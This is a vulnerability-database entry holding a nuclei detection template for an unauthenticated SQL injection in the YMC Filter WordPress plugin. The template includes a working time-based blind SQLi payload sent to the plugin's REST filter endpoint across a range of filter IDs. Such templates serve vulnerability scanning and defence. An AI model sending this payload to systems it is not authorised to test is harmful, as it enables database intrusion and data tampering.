Lucene search
+L

YMC Filter - SQL Injection

🗓️ 20 Sep 2026 02:05:09Reported by ProjectDiscoveryType 
nuclei
 nuclei
🔗 github.com👁 22 Views

YMC Filter up to 3.11.5 has a SQL injection due to improper input handling, enabling arbitrary SQL.

Related
Refs
Code
id: CVE-2026-54836

info:
  name: YMC Filter - SQL Injection
  author: theamanrawat
  severity: critical
  description: |
    YMC Filter <= 3.11.5 contains an sql injection caused by improper neutralization of special elements in SQL commands, letting attackers execute arbitrary SQL queries, exploit requires crafted input.
  impact: |
    Attackers can execute arbitrary SQL commands, potentially leading to data disclosure, modification, or deletion.
  remediation: |
    Update to the latest version beyond 3.11.5.
  reference:
    - https://nvd.nist.gov/vuln/detail/CVE-2026-54836
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:L
    cvss-score: 9.3
    cve-id: CVE-2026-54836
    epss-score: 0.01343
    epss-percentile: 0.70101
    cwe-id: CWE-89
  metadata:
    verified: true
    max-request: 1
  tags: cve,cve2026,wordpress,wp-plugin,sqli,ymc-smart-filter,unauth

http:
  - raw:
      - |
        @timeout: 20s
        POST /wp-json/ymc/v1/posts/filter HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/json

        {"params":{"filter_id":{{fid}},"search":"xyznotexist999') OR (SELECT 1 FROM (SELECT SLEEP(7))x)))-- -","post_types":["post"],"paged":1}}

    payloads:
      fid:
        - "1"
        - "2"
        - "3"
        - "10"
        - "50"
        - "100"
        - "150"
        - "152"
        - "200"
        - "250"
        - "300"
        - "500"

    stop-at-first-match: true
    matchers:
      - type: dsl
        dsl:
          - 'duration>=7'
          - 'status_code == 200'
          - 'contains(body, "\"success\":true")'
        condition: and
# digest: 4b0a00483046022100993e3a7dd16cfec2554a3d993aaa131b4ef67be98162e0fe018db07c320b5b28022100fa279989e93c95a515b19a55c55d5af1dd6cdceef06a7d1f8d5227977a578a24:922c64590222798bb761d5b6d8e72950

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

20 Jul 2026 05:26Current
6.2Medium risk
Vulners AI Score6.2
CVSS 3.19.3
EPSS0.01343
SSVC
22